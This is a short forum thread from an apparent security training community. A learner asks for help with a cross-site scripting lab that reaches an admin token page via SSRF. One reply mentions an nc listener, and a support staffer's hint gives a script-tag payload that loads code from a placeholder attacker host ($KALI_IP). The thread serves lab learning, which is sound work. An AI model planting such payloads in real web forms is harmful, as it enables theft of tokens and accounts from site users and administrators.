Forum Discussion
shubham
Bronze I
2 years agoCross-Site Scripting: Ep.6 – Further Exploitation
I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
- 2 years ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
ChrisKershaw
Community Support
2 years agoHey shubham
Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊.
I'll be happy to share a hint to help you with your lab attempt:
In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>
Will you see if this helps you with your attempt?